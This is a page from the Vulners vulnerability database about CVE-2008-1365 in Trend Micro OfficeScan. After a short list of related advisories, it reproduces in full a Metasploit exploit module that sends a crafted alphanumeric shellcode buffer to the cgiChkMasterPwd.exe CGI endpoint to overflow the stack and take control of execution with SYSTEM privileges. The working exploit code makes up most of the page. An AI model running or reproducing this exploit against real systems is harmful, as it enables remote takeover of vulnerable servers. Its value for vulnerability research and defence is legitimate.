Vulners
Lucene search
Trend Micro OfficeScan Remote Stack Overflow
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2008-1365 | 9 May 201000:00 | – | circl |
 | Trend Micro OfficeScan CGI Password Decryption Buffer Overflow (CVE-2008-1365) | 25 Nov 200900:00 | – | checkpoint_advisories |
 | CVE-2008-1365 | 17 Mar 200822:00 | – | cve |
 | CVE-2008-1365 | 17 Mar 200822:00 | – | cvelist |
 | Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit) | 9 May 201000:00 | – | exploitdb |
 | KLA10370 DoS vulnerability in OfficeScan | 17 Mar 200800:00 | – | kaspersky |
 | Trend Micro OfficeScan Remote Stack Buffer Overflow | 9 Sep 200722:56 | – | metasploit |
 | CVE-2008-1365 | 17 Mar 200822:44 | – | nvd |
 | Stack overflow | 17 Mar 200822:44 | – | prion |
 | Trend Micro OfficeScan Policy Server CGI buffer overflow | 3 Mar 200800:00 | – | saint |
10
`require 'msf/core'
require 'metasm'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Trend Micro OfficeScan Remote Stack Overflow',
'Description' => %q{
This module exploits a stack overflow in Trend Micro OfficeScan
cgiChkMasterPwd.exe (running with SYSTEM privileges).
},
'Author' => [ 'toto' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-1365' ],
[ 'OSVDB', '42499' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'MinNops' => 0,
'MaxNops' => 0,
'Space' => 498,
'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
# clean up to prevent crash on exit
'Prepend' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "mov dword ptr fs:[0], 0").encode_string,
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
},
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# return addresses need to be alphanumeric (here in loadhttp data section)
[ 'Windows 2000 - Trend Micro OfficeScan 7.3.0.1293)', { 'Rets' => [0x63613035, 0x63613032] } ],
],
'DisclosureDate' => 'Jun 28 2007',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
], self.class)
end
def exploit
geip_src = "
push esi
push esp
pop eax
xor esi, [eax]
push esi
pop eax
xor eax, got_eip
push eax
pop ecx
got_eip:
"
sc = Metasm::Shellcode.assemble(Metasm::Ia32.new, geip_src)
sc.base_addr = target['Rets'][0]
get_eip = sc.encode_string
pat = Rex::Text.rand_text_alphanumeric(1016)
pat[0, get_eip.length] = get_eip
pat[14, payload.encoded.length] = payload.encoded
pat[512, 4] = [target['Rets'][1]].pack('V') # string pointer (to prevent a crash)
pat[524, 4] = [target['Rets'][0]].pack('V') # sets EIP to the address where the shellcode has been copied
pat[540, 4] = [target['Rets'][0]-1].pack('V') # shellcode will be copied at this address (+1)
data = "TMlogonEncrypted=!CRYPT!" + pat
len = sprintf("%u", data.length);
print_status("Trying target address 0x%.8x..." % target['Rets'][0])
res = send_request_cgi({
'uri' => '/officescan/console/cgi/cgiChkMasterPwd.exe',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'data' => data,
}, 5)
handler
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Nov 2009 00:00Current
1Low risk
Vulners AI Score1
EPSS0.75208